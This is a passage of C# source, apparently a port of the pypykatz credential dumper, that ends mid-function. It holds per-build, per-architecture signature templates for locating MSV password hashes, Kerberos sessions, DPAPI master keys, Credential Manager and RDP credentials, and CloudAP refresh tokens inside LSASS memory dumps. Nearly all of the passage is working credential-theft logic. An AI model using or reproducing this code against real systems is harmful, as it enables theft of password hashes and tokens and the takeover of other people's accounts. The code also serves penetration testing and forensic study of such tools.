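        /// <summary>
        /// Builds the <see cref="CloudapTemplate"/> describing the cloudap logon-list layout
        /// for the OS build and CPU architecture recorded in <paramref name="sysinfo"/>.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>
        /// A populated template. For builds up to and including WIN_10_1903 the template is
        /// returned as constructed, since no layout is defined for them here.
        /// </returns>
        /// <exception cref="NotSupportedException">
        /// Thrown when the processor architecture is neither AMD64 nor INTEL.
        /// </exception>
        public static CloudapTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            CloudapTemplate template = new CloudapTemplate();

            // Nothing is defined for builds up to 1903: hand back the empty template.
            if (sysinfo.BuildNumber <= (int)SystemInfo.WindowsBuild.WIN_10_1903)
            {
                return template;
            }

            if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                template.signature          = new byte[] { 0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75 };
                template.first_entry_offset = -9;
                template.list_entry         = typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
            }
            else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                template.signature          = new byte[] { 0x8b, 0x31, 0x39, 0x72, 0x10, 0x75 };
                template.first_entry_offset = -8;
                template.list_entry         = typeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
            }
            else
            {
                // String.Format does not understand printf-style "%s": the previous message was
                // emitted verbatim, without the architecture or build number. Interpolate instead.
                throw new NotSupportedException(
                    $"Could not identify template! Architecture: {sysinfo.ProcessorArchitecture} sysinfo.BuildNumber: {sysinfo.BuildNumber}");
            }

            // Field offsets are derived from the managed struct layouts rather than hard-coded.
            template.luidOffset  = StructFieldOffset(template.list_entry, "LocallyUniqueIdentifier");
            template.cacheOffset = StructFieldOffset(template.list_entry, "cacheEntry");

            template.cbPRTOffset  = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "cbPRT");
            template.PRTOffset    = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "PRT");
            template.tonameOffset = StructFieldOffset(typeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY), "toname");

            return template;
        }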
        /// <summary>
        /// Produces the <see cref="RdpTemplate"/> matching the Windows build in
        /// <paramref name="sysinfo"/>: one signature set and credential structure for
        /// WIN_8 and later, another for every older build.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>A template with signature, first_entry_offset and cred_struct populated.</returns>
        public static RdpTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new RdpTemplate();
            bool isWin8OrNewer = sysinfo.BuildNumber >= (int)SystemInfo.WindowsMinBuild.WIN_8;

            if (isWin8OrNewer)
            {
                template.signature = new List<byte[]>
                {
                    new byte[] { 0x00, 0x00, 0x00, 0x00, 0xbb, 0x47 },
                    new byte[] { 0x00, 0x00, 0x00, 0x00, 0xf3, 0x47 },
                    new byte[] { 0x00, 0x00, 0x00, 0x00, 0x3b, 0x01 },
                };
                template.first_entry_offset = 0;
                template.cred_struct        = new WTS_KIWI();
                return template;
            }

            // Builds older than WIN_8 use a single signature and a different structure.
            template.signature = new List<byte[]>
            {
                new byte[] { 0xc8, 0x00, 0x00, 0x00, 0xc8, 0x00, 0x00, 0x00 }
            };
            template.first_entry_offset = 16;
            template.cred_struct        = new WTS_KIWI_2008R2();
            return template;
        }
 //https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/commons/common.py#L162
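 /// <summary>
 /// Reads a pointer-sized value from the dump at <paramref name="pos"/>.
 /// AMD64 dumps yield a 32-bit read; any other architecture a 16-bit read.
 /// </summary>
 /// <param name="fileBinaryReader">Reader over the minidump; its underlying stream is repositioned.</param>
 /// <param name="pos">Absolute stream offset to read from.</param>
 /// <param name="sysinfo">System information used to choose the read width.</param>
 /// <returns>The value read, widened to <see cref="ulong"/>.</returns>
 public static ulong get_ptr(BinaryReader fileBinaryReader, long pos, SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
 {
     // SeekOrigin.Begin instead of a bare 0, matching get_ptr_with_offset.
     fileBinaryReader.BaseStream.Seek(pos, SeekOrigin.Begin);

     if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
     {
         return Minidump.Helpers.ReadUInt32(fileBinaryReader);
     }

     // NOTE(review): only 16 bits are read for non-AMD64 dumps; confirm against the
     // referenced upstream implementation that this width is intended.
     return Minidump.Helpers.ReadUInt16(fileBinaryReader);
 }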
 /// <summary>
 /// Dispatches to the LSA template builder for the dump's OS generation.
 /// Only NT6-class (WIN_VISTA and later) non-x86 dumps are handled.
 /// </summary>
 /// <param name="sysinfo">System information taken from the minidump header.</param>
 /// <returns>The template produced by lsaTemplate_NT6.get_template.</returns>
 /// <exception cref="Exception">
 /// Thrown for INTEL (x86) dumps and for builds older than WIN_VISTA (NT5).
 /// </exception>
 public static object get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
 {
     bool isX86 = sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL;
     if (isX86)
     {
         throw new Exception($"X86 not yet supported");
     }

     bool isNt5 = sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA;
     if (isNt5)
     {
         // An NT5 builder (lsaTemplate_NT5) is not wired up yet.
         throw new Exception($"NT5 not yet supported");
     }

     return lsaTemplate_NT6.get_template(sysinfo);
 }
        /// <summary>
        /// Builds the <see cref="SspTemplate"/> for the build and architecture in
        /// <paramref name="sysinfo"/>. AMD64 dumps get one of three signatures keyed on
        /// the build number; INTEL dumps share a single signature.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>A template with list_entry, signature and first_entry_offset populated.</returns>
        /// <exception cref="Exception">Thrown when the architecture is neither AMD64 nor INTEL.</exception>
        public static SspTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new SspTemplate();
            template.list_entry = new KIWI_SSP_CREDENTIAL_LIST_ENTRY();

            var arch  = sysinfo.ProcessorArchitecture;
            var build = sysinfo.BuildNumber;

            if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                template.signature          = new byte[] { 0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15 };
                template.first_entry_offset = 12;
                return template;
            }

            if (arch != SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }

            // AMD64: the three build ranges below are exhaustive, so no fallthrough case is needed.
            if (build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
            {
                template.signature          = new byte[] { 0xc7, 0x43, 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15 };
                template.first_entry_offset = 16;
            }
            else if (build < (int)SystemInfo.WindowsBuild.WIN_10_1507)
            {
                template.signature          = new byte[] { 0xc7, 0x47, 0x24, 0x43, 0x72, 0x64, 0x41, 0x48, 0x89, 0x47, 0x78, 0xff, 0x15 };
                template.first_entry_offset = 20;
            }
            else
            {
                template.signature          = new byte[] { 0x24, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15 };
                template.first_entry_offset = 14;
            }

            return template;
        }
        /// <summary>
        /// Builds the <see cref="LiveSspTemplate"/> for the architecture in
        /// <paramref name="sysinfo"/>; the build number is not consulted here.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>A template with signature and first_entry_offset populated.</returns>
        /// <exception cref="Exception">Thrown when the architecture is neither AMD64 nor INTEL.</exception>
        public static LiveSspTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new LiveSspTemplate();
            var arch = sysinfo.ProcessorArchitecture;

            if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                template.signature          = new byte[] { 0x74, 0x25, 0x8b };
                template.first_entry_offset = -7;
                return template;
            }

            if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                template.signature          = new byte[] { 0x8b, 0x16, 0x39, 0x51, 0x24, 0x75, 0x08 };
                template.first_entry_offset = -8;
                return template;
            }

            throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
        }
        /// <summary>
        /// Builds the <see cref="CredmanTemplate"/>: picks the list-entry structure by build
        /// range (pre-VISTA, VISTA..pre-7, 7 and later) and the offset by architecture.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>A template with list_entry and offset populated.</returns>
        public static CredmanTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new CredmanTemplate();
            bool is64 = sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64;
            var build = sysinfo.BuildNumber;

            // Any architecture other than AMD64 takes the x86 path; there is no explicit INTEL check.
            template.offset = is64 ? 0 : -32;

            if (build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
            {
                template.list_entry = is64 ? typeof(KIWI_CREDMAN_LIST_ENTRY_5) : typeof(KIWI_CREDMAN_LIST_ENTRY_5_X86);
            }
            else if (build < (int)SystemInfo.WindowsMinBuild.WIN_7)
            {
                template.list_entry = is64 ? typeof(KIWI_CREDMAN_LIST_ENTRY_60) : typeof(KIWI_CREDMAN_LIST_ENTRY_60_X86);
            }
            else
            {
                template.list_entry = is64 ? typeof(KIWI_CREDMAN_LIST_ENTRY) : typeof(KIWI_CREDMAN_LIST_ENTRY_X86);
            }

            return template;
        }
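        /// <summary>
        /// Builds the <see cref="MsvTemplate"/> for the dump described by <paramref name="sysinfo"/>:
        /// the logon-session list layout, the primary-credential layout, the field offsets
        /// derived from those layouts, and the per-build/per-architecture byte signature.
        /// </summary>
        /// <param name="sysinfo">
        /// System information taken from the minidump (BuildNumber, ProcessorArchitecture,
        /// msv_dll_timestamp).
        /// </param>
        /// <returns>A fully populated template.</returns>
        /// <exception cref="Exception">
        /// Thrown when the architecture is neither AMD64 nor INTEL, or when no INTEL build
        /// range matches.
        /// </exception>
        public static MsvTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new MsvTemplate();

            template.MSV1CredentialsOffset = FieldOffset <KIWI_MSV1_0_PRIMARY_CREDENTIALS>("Credentials");
            template.MSV1PrimaryOffset     = FieldOffset <KIWI_MSV1_0_PRIMARY_CREDENTIALS>("Primary");
            // Adjusted further down for the 1607+ credential layout.
            template.PasswordOffset        = 0;

            //identify credential session list structure to be used
            if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
            {
                template.list_entry = typeof(KIWI_MSV1_0_LIST_51);
            }
            else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
            {
                template.list_entry = typeof(KIWI_MSV1_0_LIST_52);
            }
            else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
            {
                template.list_entry = typeof(KIWI_MSV1_0_LIST_60);
            }
            else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
            {
                //do not do that :) //skelsec
                // The msv dll timestamp distinguishes two list layouts within this build range.
                if (sysinfo.msv_dll_timestamp > 0x53480000)
                {
                    template.list_entry = typeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ);
                }
                else
                {
                    template.list_entry = typeof(KIWI_MSV1_0_LIST_61);
                }
            }
            else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
            {
                //template.list_entry = PKIWI_MSV1_0_LIST_62
                // Same timestamp split as the WIN_7 range. A leftover Console.WriteLine of the
                // timestamp was removed here: this method should not write to stdout.
                if (sysinfo.msv_dll_timestamp > 0x53480000)
                {
                    template.list_entry = typeof(KIWI_MSV1_0_LIST_63);
                }
                else
                {
                    template.list_entry = typeof(KIWI_MSV1_0_LIST_62);
                }
            }
            else
            {
                template.list_entry = typeof(KIWI_MSV1_0_LIST_63);
            }

            // All list-entry offsets come from the managed layout selected above.
            template.ListTypeSize = Marshal.SizeOf(template.list_entry);
            template.LocallyUniqueIdentifierOffset = StructFieldOffset(template.list_entry, "LocallyUniqueIdentifier");
            template.LogonTypeOffset         = StructFieldOffset(template.list_entry, "LogonType");
            template.SessionOffset           = StructFieldOffset(template.list_entry, "Session");
            template.UserNameListOffset      = StructFieldOffset(template.list_entry, "UserName");
            template.DomainOffset            = StructFieldOffset(template.list_entry, "Domain");
            template.CredentialsOffset       = StructFieldOffset(template.list_entry, "Credentials");
            template.pSidOffset              = StructFieldOffset(template.list_entry, "pSid");
            template.CredentialManagerOffset = StructFieldOffset(template.list_entry, "CredentialManager");
            template.LogonTimeOffset         = StructFieldOffset(template.list_entry, "LogonTime");
            template.LogonServerOffset       = StructFieldOffset(template.list_entry, "LogonServer");

            // Primary-credential layout, keyed on the Windows 10 build.
            if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
            {
                template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL);
            }
            else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1511)
            {
                template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL_10_OLD);
            }
            else if (sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1607)
            {
                template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL_10);
            }
            else
            {
                template.credential_entry = typeof(MSV1_0_PRIMARY_CREDENTIAL_10_1607);
                template.PasswordOffset   = -2;
            }

            template.LogonDomainNameOffset = StructFieldOffset(template.credential_entry, "LogonDomainName");
            template.UserNameOffset        = StructFieldOffset(template.credential_entry, "UserName");
            template.LmOwfPasswordOffset   = StructFieldOffset(template.credential_entry, "LmOwfPassword") + template.PasswordOffset;
            template.NtOwfPasswordOffset   = StructFieldOffset(template.credential_entry, "NtOwfPassword") + template.PasswordOffset;
            template.ShaOwPasswordOffset   = StructFieldOffset(template.credential_entry, "ShaOwPassword") + template.PasswordOffset;

            // Only the 1607+ layout carries a DPAPIProtected field.
            if (template.credential_entry != typeof(MSV1_0_PRIMARY_CREDENTIAL_10_1607))
            {
                template.DPAPIProtectedOffset = 0;
            }
            else
            {
                template.DPAPIProtectedOffset = FieldOffset <MSV1_0_PRIMARY_CREDENTIAL_10_1607>("DPAPIProtected");
            }

            // Byte signature plus the two offsets relative to the match, per architecture and build range.
            if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
                {
                    template.signature                   = new byte[] { 0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8 };
                    template.first_entry_offset          = -4;
                    template.LogonSessionListCountOffset = 0;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    template.signature                   = new byte[] { 0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8 };
                    template.first_entry_offset          = -4;
                    template.LogonSessionListCountOffset = -45;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_7)
                {
                    template.signature                   = new byte[] { 0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84 };
                    template.first_entry_offset          = 21;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_7 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    template.signature                   = new byte[] { 0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84 };
                    template.first_entry_offset          = 19;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
                {
                    template.signature                   = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
                    template.first_entry_offset          = 16;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
                {
                    template.signature                   = new byte[] { 0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05 };
                    template.first_entry_offset          = 36;
                    template.LogonSessionListCountOffset = -6;
                }
                else if ((int)SystemInfo.WindowsBuild.WIN_10_1507 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1703)
                {
                    // WIN_10_1507 up to (not including) WIN_10_1703
                    template.signature                   = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
                    template.first_entry_offset          = 16;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)SystemInfo.WindowsBuild.WIN_10_1703 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1803)
                {
                    //1703
                    template.signature                   = new byte[] { 0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74 };
                    template.first_entry_offset          = 23;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)SystemInfo.WindowsBuild.WIN_10_1803 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1903)
                {
                    //1803
                    template.signature                   = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74 };
                    template.first_entry_offset          = 23;
                    template.LogonSessionListCountOffset = -4;
                }
                else
                {
                    //1903 and anything newer
                    template.signature                   = new byte[] { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };
                    template.first_entry_offset          = 23;
                    template.LogonSessionListCountOffset = -4;
                }
            }
            else if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                if ((int)SystemInfo.WindowsMinBuild.WIN_XP <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_2K3)
                {
                    template.signature                   = new byte[] { 0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84 };
                    template.first_entry_offset          = 24;
                    template.LogonSessionListCountOffset = 0;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_2K3 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    template.signature                   = new byte[] { 0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd };
                    template.first_entry_offset          = -11;
                    template.LogonSessionListCountOffset = -43;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_VISTA <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    template.signature                   = new byte[] { 0x89, 0x71, 0x04, 0x89, 0x30, 0x8d, 0x04, 0xbd };
                    template.first_entry_offset          = -11;
                    template.LogonSessionListCountOffset = -42;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_8 <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
                {
                    template.signature                   = new byte[] { 0x8b, 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0xde, 0x89, 0x02, 0x89, 0x5d, 0xf0, 0x85, 0xc9, 0x74 };
                    template.first_entry_offset          = 18;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)SystemInfo.WindowsMinBuild.WIN_BLUE <= sysinfo.BuildNumber && sysinfo.BuildNumber < (int)SystemInfo.WindowsBuild.WIN_10_1507)
                {
                    template.signature                   = new byte[] { 0x8b, 0x4d, 0xe4, 0x8b, 0x45, 0xf4, 0x89, 0x75, 0xe8, 0x89, 0x01, 0x85, 0xff, 0x74 };
                    template.first_entry_offset          = 16;
                    template.LogonSessionListCountOffset = -4;
                }
                else if ((int)sysinfo.BuildNumber >= (int)SystemInfo.WindowsBuild.WIN_10_1507)
                {
                    template.signature                   = new byte[] { 0x8b, 0x4d, 0xe8, 0x8b, 0x45, 0xf4, 0x89, 0x75, 0xec, 0x89, 0x01, 0x85, 0xff, 0x74 };
                    template.first_entry_offset          = 16;
                    template.LogonSessionListCountOffset = -4;
                }
                else
                {
                    // Only reachable for builds below WIN_XP.
                    throw new Exception($"Could not identify template! {sysinfo.BuildNumber}");
                }
            }
            else
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }
            return template;
        }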
 //https://github.com/skelsec/pypykatz/blob/bd1054d1aa948133a697a1dfcb57a5c6463be41a/pypykatz/commons/common.py#L168
 /// <summary>
 /// Reads a displacement stored at <paramref name="pos"/> and resolves it.
 /// On AMD64 a 32-bit displacement is taken relative to the end of the field
 /// (<c>pos + 4 + value</c>); on any other architecture the 16-bit value is returned as read.
 /// </summary>
 /// <param name="fileBinaryReader">Reader over the minidump; its underlying stream is repositioned.</param>
 /// <param name="pos">Absolute stream offset of the displacement field.</param>
 /// <param name="sysinfo">System information used to choose the read width and resolution rule.</param>
 /// <returns>The resolved value as <see cref="ulong"/>.</returns>
 public static ulong get_ptr_with_offset(BinaryReader fileBinaryReader, long pos, SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
 {
     // Both branches start from the same absolute position, so seek once up front.
     fileBinaryReader.BaseStream.Seek(pos, SeekOrigin.Begin);

     bool is64 = sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64;
     if (!is64)
     {
         ushort raw = Minidump.Helpers.ReadUInt16(fileBinaryReader);
         return raw;
     }

     // NOTE(review): the displacement is read unsigned; confirm against the referenced
     // upstream line whether a signed read is intended.
     uint displacement = Minidump.Helpers.ReadUInt32(fileBinaryReader);
     return (ulong)(pos + 4 + displacement);
 }
        /// <summary>
        /// Builds the <see cref="TspkgTemplate"/>: the byte signature and avl_offset depend on
        /// architecture and build range; the KIWI_TS_CREDENTIAL layout (plain or _1607) is
        /// chosen per branch and then used to fill the three TSCred* members.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>A populated template.</returns>
        /// <exception cref="Exception">Thrown when the architecture is neither AMD64 nor INTEL.</exception>
        public static TspkgTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new TspkgTemplate();
            var arch  = sysinfo.ProcessorArchitecture;
            var build = sysinfo.BuildNumber;

            // Which KIWI_TS_CREDENTIAL layout applies; decided per branch, applied once below.
            bool use1607Layout;

            if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                template.signature  = new byte[] { 0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x0d };
                template.avl_offset = 7;
                use1607Layout = build >= (int)SystemInfo.WindowsBuild.WIN_10_1607;
            }
            else if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                if (build < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    template.signature  = new byte[] { 0x8b, 0xff, 0x55, 0x8b, 0xec, 0x51, 0x56, 0xbe };
                    template.avl_offset = 8;
                    use1607Layout = true;
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
                {
                    template.signature  = new byte[] { 0x8b, 0xff, 0x53, 0xbb };
                    template.avl_offset = 4;
                    use1607Layout = false;
                }
                else
                {
                    // WIN_BLUE and everything newer (including 1607+) share this entry.
                    template.signature  = new byte[] { 0x8b, 0xff, 0x57, 0xbf };
                    template.avl_offset = 4;
                    use1607Layout = true;
                }
            }
            else
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }

            if (use1607Layout)
            {
                template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL_1607());
                template.TSCredLocallyUniqueIdentifierOffset = FieldOffset<KIWI_TS_CREDENTIAL_1607>("LocallyUniqueIdentifier");
                template.TSCredOffset = FieldOffset<KIWI_TS_CREDENTIAL_1607>("pTsPrimary");
            }
            else
            {
                template.TSCredTypeSize = Marshal.SizeOf(new KIWI_TS_CREDENTIAL());
                template.TSCredLocallyUniqueIdentifierOffset = FieldOffset<KIWI_TS_CREDENTIAL>("LocallyUniqueIdentifier");
                template.TSCredOffset = FieldOffset<KIWI_TS_CREDENTIAL>("pTsPrimary");
            }

            return template;
        }
        /// <summary>
        /// Builds the <see cref="DpapiTemplate"/>: list_entry is always a
        /// KIWI_MASTERKEY_CACHE_ENTRY; signature and first_entry_offset depend on the
        /// architecture and build range in <paramref name="sysinfo"/>.
        /// </summary>
        /// <param name="sysinfo">System information taken from the minidump header.</param>
        /// <returns>A populated template.</returns>
        /// <exception cref="Exception">Thrown when the architecture is neither AMD64 nor INTEL.</exception>
        public static DpapiTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            var template = new DpapiTemplate();
            template.list_entry = new KIWI_MASTERKEY_CACHE_ENTRY();

            var arch  = sysinfo.ProcessorArchitecture;
            var build = sysinfo.BuildNumber;

            if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                // Ranges are tested in ascending order, so each branch only needs its upper bound.
                if (build < (int)SystemInfo.WindowsMinBuild.WIN_VISTA)
                {
                    template.signature          = new byte[] { 0x4d, 0x3b, 0xee, 0x49, 0x8b, 0xfd, 0x0f, 0x85 };
                    template.first_entry_offset = -4;
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_7)
                {
                    template.signature          = new byte[] { 0x49, 0x3b, 0xef, 0x48, 0x8b, 0xfd, 0x0f, 0x84 };
                    template.first_entry_offset = -4;
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_8)
                {
                    template.signature          = new byte[] { 0x33, 0xc0, 0xeb, 0x20, 0x48, 0x8d, 0x05 };
                    template.first_entry_offset = 7;
                }
                else if (build < (int)SystemInfo.WindowsMinBuild.WIN_BLUE)
                {
                    template.signature          = new byte[] { 0x4c, 0x89, 0x1f, 0x48, 0x89, 0x47, 0x08, 0x49, 0x39, 0x43, 0x08, 0x0f, 0x85 };
                    template.first_entry_offset = -4;
                }
                else if (build < (int)SystemInfo.WindowsBuild.WIN_10_1507)
                {
                    template.signature          = new byte[] { 0x08, 0x48, 0x39, 0x48, 0x08, 0x0f, 0x85 };
                    template.first_entry_offset = -10;
                }
                else if (build < (int)SystemInfo.WindowsBuild.WIN_10_1607)
                {
                    template.signature          = new byte[] { 0x48, 0x89, 0x4e, 0x08, 0x48, 0x39, 0x48, 0x08 };
                    template.first_entry_offset = -7;
                }
                else
                {
                    template.signature          = new byte[] { 0x48, 0x89, 0x4f, 0x08, 0x48, 0x89, 0x78, 0x08 };
                    template.first_entry_offset = 11;
                }
            }
            else if (arch == SystemInfo.PROCESSOR_ARCHITECTURE.INTEL)
            {
                bool isWin8Range = (int)SystemInfo.WindowsMinBuild.WIN_8 <= build && build < (int)SystemInfo.WindowsMinBuild.WIN_BLUE;
                if (isWin8Range)
                {
                    template.signature          = new byte[] { 0x8b, 0xf0, 0x81, 0xfe, 0xcc, 0x06, 0x00, 0x00, 0x0f, 0x84 };
                    template.first_entry_offset = -16;
                }
                else
                {
                    // Pre-WIN_8 and WIN_BLUE-or-newer builds share the same pattern and offset.
                    template.signature          = new byte[] { 0x33, 0xc0, 0x40, 0xa3 };
                    template.first_entry_offset = -4;
                }
            }
            else
            {
                throw new Exception($"Unknown architecture! {sysinfo.ProcessorArchitecture}");
            }

            return template;
        }
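        /// <summary>
        /// Selects the Kerberos package template for the OS described by <paramref name="sysinfo"/>:
        /// the byte signature that is searched for, the offset from that signature to the first list
        /// entry and, on x64 only, the logon-session / primary-credential structure types plus the
        /// field offsets read from them. Adjacent build ranges that mapped to identical values have
        /// been folded into single branches; the selected values are unchanged.
        /// </summary>
        /// <param name="sysinfo">Minidump system info; only ProcessorArchitecture and BuildNumber are read.</param>
        /// <returns>The populated <see cref="KerberosTemplate"/>.</returns>
        /// <exception cref="Exception">
        /// The architecture is neither AMD64 nor INTEL, or the build number is below the oldest handled range.
        /// </exception>
        public static KerberosTemplate get_template(SystemInfo.MINIDUMP_SYSTEM_INFO sysinfo)
        {
            KerberosTemplate template = new KerberosTemplate();
            int build = sysinfo.BuildNumber;

            if (sysinfo.ProcessorArchitecture == SystemInfo.PROCESSOR_ARCHITECTURE.AMD64)
            {
                // Every x64 build before 1607 shares the same structure types; 1607+ switches to the _1607 layouts.
                Type sessionType    = typeof(KIWI_KERBEROS_LOGON_SESSION_10);
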